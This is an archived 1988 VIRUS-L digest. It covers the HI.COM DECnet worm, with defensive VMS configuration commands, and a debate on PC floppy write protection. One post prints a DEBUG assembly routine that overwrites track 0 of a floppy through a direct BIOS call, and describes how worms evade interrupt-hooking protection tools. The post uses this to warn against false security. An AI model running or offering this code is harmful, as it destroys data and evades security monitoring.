  7587. Cc: dcab600@ddn1.arpa, dcab602-all@ddn1.arpa, cert@SEI.CMU.EDU,
  7588.         nic@SRI-NIC.ARPA
  7589. Message-Id: <12456817800.29.NIC@SRI-NIC.ARPA>
  7590.  
  7591. **********************************************************************
  7592. DDN MGT Bulletin 50              DCA DDN Defense Communications System
  7593. 23 Dec 88                        Published by: DDN Network Info Center
  7594.                                     (NIC@SRI-NIC.ARPA)  (800) 235-3155
  7595.  
  7596.  
  7597.                         DEFENSE  DATA  NETWORK
  7598.  
  7599.                          MANAGEMENT  BULLETIN
  7600.  
  7601. The DDN MANAGEMENT BULLETIN is distributed online by the DDN Network
  7602. Information Center under DCA contract as a means of communicating
  7603. official policy, procedures and other information of concern to
  7604. management personnel at DDN facilities.  Back issues may be read
  7605. through the TACNEWS server ("@n" command at the TAC) or may be
  7606. obtained by FTP (or Kermit) from the SRI-NIC host [26.0.0.73 or
  7607. 10.0.0.51] using login="anonymous" and password="guest".  The pathname
  7608. for bulletins is DDN-NEWS:DDN-MGT-BULLETIN-nn.TXT (where "nn" is the
  7609. bulletin number).
  7610. **********************************************************************
  7611.  
  7612. SUBJECT:   Worm (Benign)
  7613.  
  7614. APPLICABLE OPERATING SYSTEM: DEC VMS
  7615.  
  7616. PROPAGATION: Propagates via DECNET protocols, not TCP/IP protocols
  7617.  
  7618. STATUS: Fix is enclosed
  7619.  
  7620. VALIDATION:  The fix has been forwarded to the CERT for validation, but
  7621. validation has not been completed.  But in order to provide timely
  7622. information to our subcribers, this fix is being made available "as
  7623. is".  It was provided by a host administrator on the NASA SPAN/DOE
  7624. HEPNET network.  We recommend that you contact your vendor and refer
  7625. to the vendor documentation listed below before attempting to implement the
  7626. fix.
  7627.  
  7628.  
  7629. PROBLEM: On Friday, 23 December, Gerard K. Newman of the San Diego
  7630. Supercomputer Center reported a Christmas Eve computer worm (not a
  7631. virus) called "HI.COM".  This worm appears to be a benign Christmas
  7632. greeting from "Father Christmas".
  7633.  
  7634. ESSENTIAL CONSIDERATIONS: The recent Internet Virus has sensitized the
  7635. telecommunications community to the potential threat of worms and
  7636. viruses.  However, "HI.COM" appears to be a prank and nothing more:
  7637.  
  7638.       (A) It only affects VMS machines connected to DECNET.
  7639.  
  7640.       (B) It does not use TCP/IP, thus it cannot "infect" the Internet
  7641.           (or MILNET/ARPANET).
  7642.  
  7643.       (C) It does no harm (all it does is send a "stop computing and go
  7644.           home" message after midnight on Christmas Eve).
  7645.  
  7646.       (D) It has safeguards against running multiple copies of itself on
  7647.           the same machine.
  7648.  
  7649.       (E) It will terminate itself after completing its mission (at 00:30
  7650.           on the 24th).
  7651.  
  7652. SYMPTOMS OF INFECTION: Some steps to take to determine if your system has
  7653. been infected are:
  7654.  
  7655.       (A) Check your accounting files and NETSERVER.LOGs in your default
  7656.           DECnet accounts for a file called HI.COM.
  7657.  
  7658.       (B) Check your processes for one named MAIL_178DC.
  7659.  
  7660. A FIX:
  7661.  
  7662. There is a worm loose on NASA's SPAN/DoE's HEPNET network, which is an
  7663. international DECnet-based network.  The worm targets VMS machines, and
  7664. can only be propagated via DECnet.
  7665.  
  7666. The worm itself appears to be benign, in that it does not destroy files
  7667. or compromise the system.  It's purpose appears to be to deliver a
  7668. Christmas message to users starting at midnight on 24 Dec 1988.  It
  7669. does have a hook in it to monitor it's progress;  it mails a message
  7670. back to a specific node (20.117, user PHSOLIDE) containing an identifying
  7671. string of the "infected" machine.
  7672.  
  7673. The worm exploits two features of DECnet/VMS in order to propagate itself.
  7674. The first is the default DECnet account, which is a facility for users who
  7675. don't have a specific login ID for a machine to have some degree of
  7676. anonymous access.  It uses the default DECnet account to copy itself to a
  7677. machine, and then uses the "TASK 0" feature of DECnet to invoke the remote
  7678. copy.
  7679.  
  7680. There are several steps which you can take to protect yourself from this
  7681. kind of attack.  The easiest (and most restrictive) is to disable the
  7682. default DECnet account on your machine altogether.  This can be done with
  7683. the following commands from the SYSTEM or other suitably privileged account:
  7684.  
  7685.     $ Run SYS$SYSTEM:NCP
  7686.     Purge Executor Nonprivileged User Account Password
  7687.     Clear Executor Nonprivileged User Account Password
  7688.     ^Z
  7689.  
  7690. This requires that everyone who accesses your resources via DECnet to have
  7691. a legitimate login ID or proxy login account on your machine (proxy logins
  7692. are discussed in detail in chapter 7 of the "Guide to VMS System Security",
  7693. see below).
  7694.  
  7695. You can take less restrictive steps to protect your machine while still
  7696. maintaining some degree of default access.  If you wish to keep the ability
  7697. for users to copy files to the default DECnet account but wish to prevent
  7698. them from copying DCL command procedures there and then executing them you
  7699. can issue the following commands (again from the SYSTEM or other suitably
  7700. privileged account):
  7701.  
  7702.     $ Run SYS$SYSTEM:NCP
  7703.     Clear Object Task All
  7704.     ^Z
  7705.  
  7706. You must then edit the file SYS$MANAGER:STARTNET.COM, and add the line
  7707.  
  7708.     CLEAR OBJECT TASK ALL
  7709.  
  7710. AFTER the line which says
  7711.  
  7712.     SET KNOWN OBJECTS ALL
  7713.  
  7714. This has the side-effect of disabling users from executing any command
  7715. procedure via DECnet that the system manager has not defined in the
  7716. DECnet permanent database.  These steps alone are not sufficient to
  7717. prevent copies of the virus from being copied to your machine;  but they
  7718. will prevent it from being executed.  To prevent copies of this specific
  7719. virus from being copied to your machine you can issue the following
  7720. commands (from the SYSTEM or other privileged account):
  7721.  
  7722.     $ Set Default your-default-decnet-directory
  7723.     $ Create HI.COM
  7724.     $ Stop/ID=0
  7725.     ^Z
  7726.     $ Set File/Owner=[1,4]-
  7727.     /Protection=(S:RWED,O:RWED,G:RE,W:RE)/Version=1 HI.COM
  7728.  
  7729. This prevents anyone from copying a file called "HI.COM" into your default
  7730. DECnet account;  however, other files can be copied there unless you disable
  7731. access to the DECnet object FAL (the File Access Listener) from your default
  7732. DECnet account.  This can be done by creating a specific account for FAL
  7733. (using the AUTHORIZE utility) with a seperate UIC, default directory, and
  7734. minimal privileges and forcing the FAL object to use that account.  The
  7735. following sequence of commands are an example (these commands also require
  7736. that they be issued from the SYSTEM or other suitably privileged account):
  7737.  
  7738.  
  7739.     $ Set Default SYS$SYTEM
  7740.     $ Run AUTHORIZE
  7741.     Add FAL/UIC=[some-unused-UIC]/Owner="DECnet default FAL"-
  7742.     /Password=randomstring/Device=disk-device/Directory=[some-directory]-
  7743.     /Flags=(DISCTLY,DEFCLI,CAPTIVE,LOCKPWD)/NoBatch/NoLocal/NoDialup-
  7744.     /NoRemote/Privileges=(TMPMBX,NETMBX)/DefPrivileges=(TMPMBX,NETMBX)-
  7745.     /LGICMD=SYS$SYSTEM:FALLOG.COM
  7746.     ^Z
  7747.     $ Run NCP
  7748.     Define Object FAL Number 17 File SYS$SYSTEM:FAL User FAL -
  7749.     Password same-random-string
  7750.     Set Object FAL Number 17 File SYS$SYSTEM:FAL User FAL -
  7751.     Password same-random-string
  7752.     ^Z
  7753.     $ Create FALLOG.COM
  7754.     $ V := 'F$Verify(0)
  7755.     $ Write SYS$OUTPUT ""
  7756.     $ Write SYS$OUTPUT "''F$Time()' -- Node ''F$Logical("SYS$NODE")'"
  7757.     $ Write SYS$OUTPUT "''F$Time()' -- Remote file access from:"
  7758.     $ Write SYS$OUTPUT "''F$Time()' -- User: ''F$logical("SYS$REM_ID")'"
  7759.     $ Write SYS$OUTPUT "''F$Time()' -- Node: ''F$Logical("SYS$REM_NODE")'"
  7760.     $ Write SYS$OUTPUT ""
  7761.     ^Z
  7762.  
  7763. This sequence of commands separates the FAL account from the default DECnet
  7764. account, and you can use file protections to enforce that the FAL account
  7765. cannot access files in the default DECnet account and vice-versa.  The
  7766. command file FALLOG.COM above will log all remote file accesses in the
  7767. file NETSERVER.LOG in the directory specified for the FAL account above.
  7768.  
  7769. The FAL program can supply additional logging information;  contact your
  7770. DIGITAL software support person for further details.
  7771.  
  7772. Further steps can be taken to restrict access to your system.  These
  7773. steps are discussed in detail in the "Guide to VMS System Security", DEC
  7774. order number AA-LA40A-TE, dated April 1988.  See in particular chapter 7,
  7775. entitled "Security for a DECnet Node".
  7776.  
  7777. For general information about this patch call the CERT or the Network
  7778. Information Center at (800) 235-3155.
  7779.  
  7780. This represents the best information available at this time to fix this
  7781. problem.
  7782.  
  7783.  
  7784. - - -------
  7785.  
  7786.  
  7787. - - --- End of forwarded message from DDN Reference <NIC@SRI-NIC.ARPA>
  7788.  
  7789.  
  7790. - ------- Message 6
  7791.  
  7792. Return-Path: tcp-ip-RELAY@SRI-NIC.arpa
  7793. Received: Mon, 26 Dec 88 00:07:50 PST from MITRE.ARPA by nsipo.arc.nasa.go
  7794. (5.59/1.5)
  7795. Received: from ucbvax.Berkeley.EDU by SRI-NIC.ARPA with TCP; Sun, 25 Dec 88
  7796.  23:07:38 PST
  7797. Received: by ucbvax.Berkeley.EDU (5.61/1.33)
  7798.     id AA02165; Sun, 25 Dec 88 22:41:55 PST
  7799. Received: from USENET by ucbvax.Berkeley.EDU with netnews
  7800.     for tcp-ip@sri-nic.arpa (tcp-ip@sri-nic.arpa)
  7801.     (contact usenet@ucbvax.Berkeley.EDU if you have questions)
  7802. Date: 26 Dec 88 06:39:55 GMT
  7803. From: brian@ucsd.edu  (Brian Kantor)
  7804. Organization: The Avant-Garde of the Now, Ltd.
  7805. Subject: Re: DECNET Virus (sorry)
  7806. Message-Id: <1339@ucsd.EDU>
  7807. References: <8812232057.AA02489@ron.rutgers.edu>
  7808. Sender: tcp-ip-relay@sri-nic.arpa
  7809. To: tcp-ip@sri-nic.arpa
  7810.  
  7811. I received the following message last Friday; I mailed it off to
  7812. the "phage" security list and it bounced because Purdue's mailer is
  7813. broken, so I'll post it here.  I hesitated to do this at first, since
  7814. it's not directly relevant and I sure didn't want to panic people into
  7815. wildly shutting down bridges and gateways again.
  7816.  
  7817. SPAN (Space Physics Analysis Network??) is a DECNet network, so it
  7818. lacks direct relevance to the TCP/IP list, but probably this is of
  7819. at least passing interest.
  7820. - - ---
  7821. Date:    Fri, 23 Dec 88 02:53:13 GMT
  7822. From: gkn@Sds.Sdsc.Edu (Gerard K. Newman)
  7823. Subject: SPAN WORM ALERT
  7824.  
  7825. Ladies and gentleman,
  7826.  
  7827. Someone has loosed a worm on SPAN at this very moment.  Check your accounting
  7828. files and NETSERVER.LOGs in your default DECnet accounts.  You'll find evidence
  7829. of someone creating a file (HI.COM, which I am in the process of fetching from
  7830. the deleted blocks of one of them) which propagates itself around the network.
  7831.  
  7832. It has hit all of the VMS machines here at SDSC today, and simply appears to
  7833. crawl around and send mail to 25097::PHISOLIDE (node 25.79, for which I do not
  7834. have a name in my DECnet database).
  7835.  
  7836. It will take me a few more minutes to cobble together a program to dredge up
  7837. the blocks of the command file (one of the first things it does is to delete
  7838. itself ... it also sets it's process name to MAIL_178DC, so look around for
  7839. those, too).  When I have it I will forward the text.
  7840.  
  7841. An adequate defense against the problem is:
  7842.  
  7843. (from the SYSTEM or other suitably privileged account):
  7844.  
  7845.     $ Set Default your-default-decnet-area
  7846.     $ Create HI.COM
  7847.     $ Stop/ID=0
  7848.     ^Z
  7849.     $ Set File/Owner=[1,4]/Protection=(S:RWED,O:RWED,G:RE,W:RE)/Version=1 HI.COM
  7850.  
  7851. This information should receive the widest possible distribution.
  7852.  
  7853. I will forward a copy of the command file in a few minutes.
  7854.  
  7855. Please give me a call (# below) if you need more information.
  7856.  
  7857. gkn
  7858. - - ----------------------------------------
  7859. Internet: GKN@SDS.SDSC.EDU
  7860. Bitnet:   GKN@SDSC
  7861. Span:      SDSC::GKN (27.1)
  7862. MFEnet:   GKN@SDS
  7863. USPS:      Gerard K. Newman
  7864.       San Diego Supercomputer Center
  7865.       P.O. Box 85608
  7866.       San Diego, CA 92138-5608
  7867. Phone:      619.534.5076
  7868.  
  7869. - ------- End of Forwarded Messages
  7870.  
  7871. ------------------------------
  7872.  
  7873. End of VIRUS-L Digest
  7874. *********************VIRUS-L Digest             Thursday, 29 Dec 1988        Volume 1 : Issue 59c
  7875.  
  7876. Today's Topics:
  7877. DOS, BIOS and write-protect tabs (PC)
  7878. Dirty Dozen
  7879. Re: Brain virus (PC)
  7880. Write Protection confusion (PC)
  7881.  
  7882. ---------------------------------------------------------------------------
  7883.  
  7884. Date:     Mon, 26 Dec 88 14:45 EST
  7885. From:     Dimitri Vulis <DLV@CUNYVMS1.BITNET>
  7886. Subject:  DOS, BIOS and write-protect tabs (PC)
  7887.  
  7888.  
  7889. I feel obliged to add my 2 bits worth to the discussion; it seems, everyone
  7890. else did, and I happen to know more about it than authors of some previous
  7891. postings. I hope this would be helpful. Please feel free to flame me if I
  7892. omitted something or made a mistake.
  7893.  
  7894. There are 3 ways an application program can access disks _via_DOS:
  7895.  
  7896. 1) (Most common) Issue INT 21h (DOS call) with a function number that has
  7897. something to do with files, e.g. `open file', `create file' etc.
  7898.  
  7899. 2) Issue INT 25 or INT 26 to read or write a logical sector on a logical device
  7900. (useful for system-level hacking, like CHKDSK).
  7901.  
  7902. 3) Use certain subfunctions on IOCTL call (INT 21h, AH=44) that can
  7903. read/write/format logical devices.
  7904.  
  7905. The code in IBMDOS.COM (in PC-DOS) or in MSDOS.SYS (in MS-DOS) will
  7906. figure out which device you are referring to (e.g. a floppy disk, a
  7907. hard disk, a RAM disk, a substituted disk that's really a directory, a
  7908. network device, etc) and if it's a floppy disk or a hard disk, it will
  7909. issue an INT 13, after loading information like track # and sector #
  7910. into registers.
  7911.  
  7912. An application program can also issue INT 13 directly.
  7913.  
  7914. (I will discuss the hard disk variant below; for now, assume it's a
  7915. floppy disk)
  7916.  
  7917. Now, INT 13 points (ordinarily) to BIOS code in ROM. (In fact, on PS/2
  7918. it's intercepted by DASDDRVR.SYS to patch some bugs in ROM; and many
  7919. versions of DOS intercept it to implement some kind of caching; and
  7920. see below; and some fast machines copy ROM into fast RAM at boot time;
  7921. but it will end up executing BIOS code from ROM anyway). Now, there
  7922. can be no `undocumented' BIOS calls on a machine for which a
  7923. well-commented BIOS listing is published. BIOS code issues IN and OUT
  7924. commands to make sure that the floppy disk is spinning, the head
  7925. assembly is at the right track, the sector ID matches the one
  7926. requested, the DMA circuitry copies the data from the disk controlled
  7927. to the right location in memory.
  7928.  
  7929. >I did my homework before I wrote my opinion.  I already knew about the
  7930. >documented BIOS interrupt limitations.  There are undocumented BIOS
  7931. >calls, and there are non-BIOS hardware calls.
  7932.  
  7933. There can be no `undocumented' BIOS calls. However, there are many
  7934. other possible commands to the disk controlled that cannot be issued
  7935. by the INT 13 BIOS code.
  7936.  
  7937. An application program can issue these calls too, there's no
  7938. `supervisor mode' on the PC, but it's rather complicated. Many
  7939. copy-protection checking programs do that. Sometimes they first issue
  7940. and INT 13 to seek the right track and to spin the drive, and issue
  7941. fewer IN/OUT instructions.
  7942.  
  7943. Note: Many years ago I wrote a bunch of assembly language routines to
  7944. access _all_ possible functions on the controller, not only the ones
  7945. used by BIOS.  They are huge and very hard to use. If Ken really wants
  7946. them, I'll give them to him with pleasure.
  7947.  
  7948. _All_ the codes are documented in the Motorola book, or in the Intel
  7949. book (Intel makes a similar controller, and their book is _much_
  7950. easier to read).
  7951.  
  7952. If the disk drive assembly detects that the disk drive is
  7953. write-protected (note the IF), it refuses to write on the hard disk
  7954. and the disk controller sets a certain flag on its latch that's read
  7955. (IN'ed) by the BIOS code and understood to mean `write protect error'.
  7956. It's not done `in software' in this sense.
  7957.  
  7958. However, many cheap disk drives use unorthodox means to detect the
  7959. tab. A vanilla full-height 5.25" IBM drive tried to stick a kind of
  7960. lever into the notch, and if it failed to, it would assume there's a
  7961. tab over the notch. (Note sure about the modern 3.5" drives; i.e. I'm
  7962. sure it's hardware, but it may be optical). Now, some early
  7963. compatibles (notably the first Compaq) tried to see if a light
  7964. _bounces_off_ the notch (you will recall that ca 1981-82 all write
  7965. protect tabs had mirror-like foil on the outside). This did not detect
  7966. black tabs of Scotch tape. Newer drives flash a light on one side of
  7967. the latch and try to detect it on the other; this does not detect
  7968. Scotch tape either. (I know one prominent mathematician, who will
  7969. probably read this, and who uses Scotch tape exclusively). On the
  7970. vanilla IBM drive, one could disable the detection mechanism with a
  7971. screwdriver, as outlined in IBM's manual for the drive.
  7972.  
  7973. So, a driver may fail to detect a tab if the detection mechanism is
  7974. disabled, or the drive is broken, or it does not detect this kind of
  7975. tabs. However, it does not matter _how_ you access the drive; i.e.
  7976. (Doz Kzem should try it) if you write-protect a disk and try to create
  7977. a file on it and get `Write protect error writing drive A:', then
  7978. there's no way a program can write to that disk in that drive using
  7979. BIOS calls or directly issuing IN/OUT. On the other hand, the drive
  7980. _may_ create the file, so I would not disregard
  7981.  
  7982. >When the PC was a baby, one or two software vendors (obscure ones) had
  7983. >a copy protection scheme that involved writing something to their own
  7984. >diskettes, whether write protected or not, on the user's machine.
  7985.  
  7986. I've never heard about it, but my conjecture is that their copy
  7987. protection code _attempted_ to write on write-protected diskettes,
  7988. failed on real IBMs and succeeded on cheap clones.
  7989.  
  7990. >research (see his V1 #54 contribution) that disk controller ROM is loaded
  7991. >into RAM at boot time.  You could tweak it as you liked, then!  You could
  7992. >prevent it from being reloaded, you could change the logic states.
  7993.  
  7994. No, this makes no sense. There's no need to alter the BIOS code (which
  7995. is copied into RAM on _a_few_ fast machines), since the application
  7996. program can issue the INs and OUTs by itself.
  7997.  
  7998. Now, when a program issues an INT (or when it comes from the hardware)
  7999. the instruction pointer and the flags (6 bytes altogether) are pushed
  8000. onto the stack and a new instruction pointer is loaded from low
  8001. memory, e.g. from [13h*4] for INT 13. Most `virus prevention' programs
  8002. operate by intercepting various interrupts, re-directing them to a
  8003. code that tells the user what's going on before passing control to the
  8004. original INT 13 code. A clever worm can circumvent this, e.g. by
  8005. issuing PUSHF and far call to F000:EC59 on almost all PC compatibles
  8006. (For floppies only!!).
  8007.  
  8008. With the hard disk, it's slightly trickier. On _most_ machines, at
  8009. boot time INT 13 is redirected to another ROM routine which checks if
  8010. the drive is a hard or a floppy, and if the latter, passes control to
  8011. INT 40 (the original floppy-only INT 13). All the so-called
  8012. `write-protection' for hard disks is software-only indeed (I'm _still_
  8013. unaware of a single HD with a write-protect switch, what a damn
  8014. shame!) So, a worm can circumvent such protection by not calling a
  8015. straight INT 13, but jumping to the hard disk BIOS code directly.
  8016. This will also bypass the `protection' provided by booting from a very
  8017. old DOS that does not recognize the hard disk.
  8018.  
  8019. I don't see how a low-level format will help (a worm-infected hard
  8020. disk) unless the worm is hiding in the BIOS boot sector (where the
  8021. partition table lives).  If that is the case, you can just write
  8022. garbage there and re-run FDISK to recreate the partition table and the
  8023. new boot record and hope that your data is intact. (Of course this
  8024. won't work if your boot record is not vanilla, but something like DM,
  8025. but there's no reason to use that if you have DOS 3.3) If your
  8026. worm/virus is file-based, it'll survive the backup/restore.
  8027.  
  8028. >A virus or Trojan already present in memory (because it was run since
  8029. >the last cold boot) can trap keystroke combinations like Control-Alt-
  8030. >Delete and fake a warm boot by calling a similar BIOS routine that does
  8031. >not clear active memory.  Power users would probably detect this from
  8032.  
  8033. The reference is, apparently, to INT 19. However, INT 19 does not
  8034. reset any interrupt vectors. The only place where it can be used
  8035. safely is in the boot code itself (after `press any key') If you have
  8036. any OS code in memory and issue INT 19, the system will halt. If you
  8037. did not know that, _try_it_ before flaming me.
  8038.  
  8039. On machines with a `reset' button, the button tweaks a pin on the CPU
  8040. which causes it to stop whatever it was doing and jump to an address
  8041. in ROM (the same it jumps to when it's turned on) which does various
  8042. diagnostics, sets the interrupt vectors, etc. I see no way to
  8043. intercept this via software.
  8044.  
  8045. When a user presses ctl-alt-del, the keyboard code in BIOS (which is
  8046. invoked by INT 9 every time a key is pressed or released) jumps to
  8047. BIOS code that does a lot of machine-specific stuff, then redirects
  8048. interrupt vectors to their default values, then boots. A worm sitting
  8049. in memory (not a _virus_) would have to duplicate all the
  8050. machine-specific stuff for various possible machines, making it
  8051. _a_lot_ bigger than the Brain, to survive a worm boot. I.e. it's
  8052. feasible, but it would be quite large, and not generic (like the
  8053. Yale).
  8054.  
  8055. It's OK, I've seen worse statements associated with the Brain virus,
  8056. e.g. a user complained that it infected the BAT files on his hard
  8057. disk. If only we did not have so much hype/ignorance associated with
  8058. the subject...
  8059.  
  8060. >An IBM PC can write to a write protected floppy via a low level BIOS
  8061. >directive which bypasses DOS and directly addresses the diskette drive
  8062. >controller hardware.  If the BIOS directive is absent from some versions
  8063. >of DOS, it may still be possible to address the hardware below the BIOS
  8064.  
  8065. What nonsense, if you pardon my French. Ken should filter out such stuff.
  8066.  
  8067. >This topic has been kicked around inconclusively here for some time
  8068. >now, and unless someone can come up with a verifiable and duplicatable
  8069. >method to get around a properly write-protected disk, then I think
  8070. >that we should assume that it is not possible to circumvent.
  8071.  
  8072. Hear, Hear! If you've read so far, I hope you're so bored with the
  8073. subject that any further discussion of it will be banned. Why beat a
  8074. dead horse? Why throw pearls to porcupines? Etc.
  8075.  
  8076. Also:
  8077.  
  8078. >From:     Robert Slade <USERCE57@UBCMTSG.BITNET>
  8079. >Subject:  BRAIN in the USSR (PC)
  8080. >
  8081. >     No one has cross posted it yet, but RISKS 7.96 has an article
  8082. >about virus infection in the USSR.  They have, of course, developed
  8083. >the ultimate anti virus program, the details of which remain a state
  8084. >secret ...
  8085.  
  8086. To the best of my knowledge, the virus infected (a few of) their IBM
  8087. S/370 compatibles on AKADEMSET, an academic network similar to BITNET.
  8088. Apparently they still run RSCS v1, which is so full of holes that it's
  8089. just unsportsmanlike to take over the server. They patched up some of
  8090. the holes; a better solution would be to upgrade to ISO/OSI. What made
  8091. you think it had anything to do with Brain or PCs?
  8092.  
  8093.  
  8094. - -Dimitri Vulis
  8095. - -Math Dept
  8096. - -CUNY Graduate Center
  8097.  
  8098. [Ed. A very enlightening message, thank you.  With regards to
  8099. filtering out "such stuff", however, do you really think that it's
  8100. fair and even appropriate for me to filter out things that I feel may
  8101. not be technically correct.  For one, I just don't have the time to do
  8102. it.  Also, I don't want to be a censor; I want VIRUS-L to be an *open*
  8103. discussion forum where people can voice their opinions, as well as
  8104. pass on technical information.  If someone is incorrect in a technical
  8105. description, then it generally gets pointed out quite rapidly.  Case
  8106. in point - write protect notches.]
  8107.  
  8108. ------------------------------
  8109.  
  8110. Date:         Tue, 27 Dec 88 16:10:31 MEZ
  8111. From:         Konrad Neuwirth <A4422DAE@AWIUNI11.BITNET>
  8112. Subject:      Dirty Dozen
  8113.  
  8114. Where can I get the last copy of DD from, or what is the last edition ?
  8115.  
  8116. The copy from the listserv is from 05-05-88.
  8117.  
  8118. Or will it not be updated any more because it is already too long ?
  8119.  
  8120. tnx
  8121. Konrad
  8122.  
  8123. ------------------------------
  8124.  
  8125. Date:  Tue, 27 Dec 88 11:22 MST
  8126. From:  Lypowy@UNCAMULT.BITNET
  8127. Subject:  Re: Brain virus (PC)
  8128.  
  8129. In Virus-L Digest 1.56 Jeff Ogata speculates on the capabilities of
  8130. the (C)Brain virus to infect via a bootable/non-bootable floppy disk.
  8131. My recent experience with the (C)Brain virus is thus:
  8132.  
  8133. We (myself, a colleague, and my course supervisor) received a copy of
  8134. the (C)Brain virus on a NON-BOOTABLE disk.  The disk's boot block,
  8135. however, was infected.  On a clean machine we placed this disk in
  8136. drive A: and attempted to boot with it.  We received the usual error
  8137. message about the disk being non-bootable, so then placed a bootable
  8138. (and write-protected) floppy into the drive.  Well, lo and behold, we
  8139. then executed some commands on a non- write-protected disk and this
  8140. disk became infected.  Thus we could only deduce that the machine
  8141. first executes the contents of the boot block and THEN checks to see
  8142. if the disk is bootable (a DOS disk).  This may have been mentioned
  8143. previously, but I thought it was apropos with regards to Jeff's recent
  8144. comments.
  8145.  
  8146.  
  8147.           Greg Lypowy
  8148.           Research Assistant
  8149.           Knowledge Sciences Institute
  8150.           University of Calgary
  8151.           Calgary, Alberta, CANADA UNCAMULT.BITNET)
  8152.  
  8153. ------------------------------
  8154.  
  8155. Date:     Thu, 29 Dec 88 15:01 EST
  8156. From:     Dimitri Vulis <DLV@CUNYVMS1.BITNET>
  8157. Subject:  Write Protection confusion (PC)
  8158.  
  8159. This kind of complacent thinking can be hazardous to your data!
  8160.  
  8161. >From: Steve Clancy <SLCLANCY@UCI.BITNET>
  8162. >I have used Trapdisk in the past and am very pleased with it.
  8163. >Trapdisk is a newer version of something that used to be called BOMB.
  8164. >I like it because it allows a command line, such as TRAPDISK WF as a
  8165. >command to write protect your disk against a write or format.  I also
  8166. >like being able to disable it at will (TRAPDISK U), but I do not like
  8167. >that it remains memory resident.  There is also another very good
  8168. >program called HDSENTRY.
  8169. >
  8170. >I'm afraid that I cannot comment on how well either handle
  8171. >sophisticated attempts to get around their protection.
  8172.  
  8173. Both of these programs (and others like them) are
  8174. _extremely_dangerous_. They give the user a false sense of security,
  8175. while it fact they provide _very_ _little_protection. They offer some
  8176. protection against amateurish benign programs, like Brain, that are
  8177. not really trying to destroy any data. They would not work against
  8178. something like ARC 5.13, which called BIOS through CALL, not via INT,
  8179. and you are more likely to run something like it, because you believe
  8180. that you're protected, and use less discretion in deciding what to run
  8181. on your machine. As an illustration, `write-protect' a floppy (which
  8182. you don't need---you will have to re-format it) _in_software_ and run
  8183. the following code in DEBUG:
  8184.  
  8185.     MOV     AX,0309
  8186.     XOR     BX,BX
  8187.     XOR     CX,CX
  8188.     XOR     DX,DX
  8189.     MOV     ES,DX
  8190.     PUSHF
  8191.     CALL    F000:EC59
  8192.     RET
  8193.  
  8194. This will write garbage over track 0 in floppy drive A:, and no
  8195. software will notice. A similar approach can (and was) used for hard
  8196. disks. Here it's a little trickier, and I will not post the code for
  8197. obvious reasons, but the thing to remember is that such `software
  8198. write protect' can do very little against a Trojan horse intent on
  8199. destroying data on the hard disk.
  8200.  
  8201. >From: Richard Baum <KREBAUM@VAX1.CC.LEHIGH.EDU>
  8202. >...      It seems  that the  circut tried to   reflect light off  of a
  8203. >mirror  on the opposite  side of  the  slot where  the   diskette  was
  8204. >supposed to go....
  8205.  
  8206. Ha Ha. Except, some early PC compatibles had this kind of sensors too.
  8207. (I mentioned this in an earlier message.) Scotch tape does not work in
  8208. some newer drives with optical sensors.
  8209.  
  8210. 3.5" drives use a completely different mechanism, as we all know; a
  8211. little thing slides back and forth, etc, and I don't have a technical
  8212. reference here to verify that it's purely hardware, but I'd bet my
  8213. life that it is too. Since there is little doubt here that the sensor
  8214. is optical and little choice of tab material (you use whatever's
  8215. already on the drive!) such problems should not occur.
  8216.  
  8217. > Leonard P. Levine
  8218. >Sorry folks, but my technical folks tell me that the write tab on a
  8219. >floppy is a soft thing.
  8220.  
  8221. Whoever pays these folks salary should be informed of this, so s/he
  8222. can stop wasting his/her $$$. The following is meant as a flame of
  8223. Milwaukee's incompetent technical folks, not of Prof. Levine
  8224. personally.
  8225.  
  8226. >I now get that there is a line from the drive to its controller that
  8227. >is high when the disk is write protected.  A switch (this was actually
  8228. >done) in that line can emulate a write locked or unlocked state
  8229. >independent of a tab on the disk.  Thus, at the drive level, the
  8230. >protection is not hardware.
  8231.  
  8232. IBM Personal Computer AT High Capacity Diskette Drive insert says:
  8233. (Page 4)
  8234. - -Write Gate
  8235. An active level of this input enables the write current circuits...
  8236. (Page 5)
  8237. - -Write protect
  8238. An active level of this signal means that a diskette without a
  8239. write-protect notch is in the driver. The drive will not write when a
  8240. protected diskette is loaded.
  8241.  
  8242. Ditto Personal Computer AT Double Sided diskette Drive insert (same
  8243. words, same page).
  8244.  
  8245. The logic diagram shows a `Write protect sensor' wired to -WriteProtect.
  8246.  
  8247. Certainly, one can disable the `Write Protect Sensor', which is a kind
  8248. of lever on the very old driver, e.g. with a screwdriver. This is how
  8249. software gets on those distribution disks without a notch, in case you
  8250. wondered (i.e. the drive will write whether or not the notch is
  8251. covered). Why insert a switch? And what is all this, if not hardware?
  8252. Mindware?
  8253.  
  8254. >They also tell me that the controller ROM is loaded into RAM at boot
  8255. >time, and may be reloaded by the processor during program execution.
  8256. >I am not sure what this implies but it seems to improve the chances
  8257. >that a change in the driver will be corrected from time to time.
  8258.  
  8259. The BIOS routines might conceivably be altered/sabotaged on machines
  8260. that copy it to fast RAM. What good (or bad) will this do in terms of
  8261. write protection?  There is no supervisor mode on the PC. The
  8262. application program can issue the same INs/OUTs as the BIOS routines
  8263. with the same degree of success, since the FDC microcode is not
  8264. compromized.
  8265.  
  8266. >My people tell me that the controller merely sets an interrupt when an
  8267. >attempt is made to write to a locked disk.  They feel, but have not
  8268. >tested, that an attempt to write around the bios can ignore this
  8269. >interrupt.  If they are right, there is no such thing as a write
  8270. >locked disk in the pc environment.
  8271.  
  8272. I feel that people should stop wasting the bandwidth on the stuff
  8273. other people feel, believe, or have heard. I am sorry if I'm being
  8274. rude, but my mailbox is _stuffed_ by this write-protect discussion,
  8275. people discussing stuff they know nothing about and saying total
  8276. nonsense. I _used_ to enjoy reading this list very much and I'd be
  8277. rather upset if I have to unsubscribe from it because the
  8278. pearl-to-manure ratio continues to approach zero.
  8279.  
  8280. >From: Ken van Wyk <luken@spot.CC.Lehigh.EDU>
  8281. >When writing to floppy disk, the code instructs the disk controller to
  8282. >perform the write sequence, and *THEN* it checks to see whether that
  8283. >failed due to (among other things) a write protect situation.
  8284.  
  8285. Precisely. To be even more precise, it initiates the operation and
  8286. waits for the interrupt. When the operation is complete (whether
  8287. success or failure), an interrupt routine (on page 5-72) sets the flag
  8288. saying the interrupt has occurred. Then the routine on page 5-72 reads
  8289. the latches from the FDC and stores their values in low memory. Their
  8290. values are explained in the old edition of Tech ref, but not in this
  8291. one. The FDC does not `test' for write protection until the whole
  8292. operation is set up, and if it fails, then there's nothing to continue
  8293. or restart. The same protocol has to be followed if you issue the
  8294. commands from the app program.
  8295.  
  8296. >                                            until anyone can send me a
  8297. >few lines of MASM code that will write to a properly functioning
  8298. >write-protected floppy disk.  Any takers?
